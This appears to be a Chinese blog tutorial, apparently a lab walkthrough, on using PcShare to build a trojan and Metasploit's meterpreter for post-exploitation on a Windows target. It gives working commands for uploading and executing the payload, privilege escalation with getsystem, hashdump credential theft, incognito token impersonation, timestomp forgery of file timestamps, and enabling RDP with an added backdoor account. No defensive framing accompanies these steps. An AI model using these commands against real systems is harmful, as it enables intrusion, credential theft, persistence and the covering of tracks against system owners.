-
用Pcshare生成1.exe的muma,放在桌面保存为1.exe。
注意:ip地址一定是物理机ip地址(不要填错)
image.png
-
上传1.exe到kail
image.png
进入界面
image.png
命令:upload <file> <destination> ---- 上传本机的任意文件到远程目标主机中。
正确写法upload //root//1.exe c://1.exe
image.png
命令:
命令:execute -f <path> [options] 正确写法:execute -f c://11.exe
---执行命令
image.png
download命令可以下载远程主机上的文件
命令:download <file> <path to save>
正确写法download c://1.txt //root//
image.png
显示目标主机上所有正在运行的进程
ps命令
image.png
获取目标主机的cmd
shell命令可以进入目标主机的cmd
image.png
获取admin权限
getsystem命令可以提权到本地系统权限
image.png
hashidump使用Hashdump转储所有hash值
我们可以使用meterpreter shell来dump目标主机的当前系统账户和密码。
image.png
模拟任意用户登录 token
模拟任意用户(token操作)
这个进程对于攻击像微软活动目录这样的分布式系统非常有帮助,因为在微软活动目录中,本地访问权限并没多大用,但是如果能搞到凭证尤其是管理员凭证,那就非常有用了。
incognito最开始是一个独立的应用,当你成功入侵系统后可以用它来模拟用户tokens。这个应用后来集成到了metasploit,并且最终集成到了meterpreter中,使用如下:
在meterpreter会话中加载这个模块非常简单,只要输入 use incognito命令即可
输入list_tokens -u来显示所有有效的tokens
我们需要模拟某个token来获取其权限。还有注意,如果成功模拟了一个token,我们可以使用getuid命令来检查当前用户ID
use incognito
list_tokens -u
impersonate_token "win7_qi-pc/administor"
注:这个好像只能从高等级的用户向低权限的用户转换
image.png
伪造时间戳
timestomp C://4.png -f C://1.txt
-
将1.txt的时间戳复制给4.png
image.png
image.png
开启3386
run post/windows/manage/enable_rdp
开启远程桌面
image.png
image.png
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
image.png













网友评论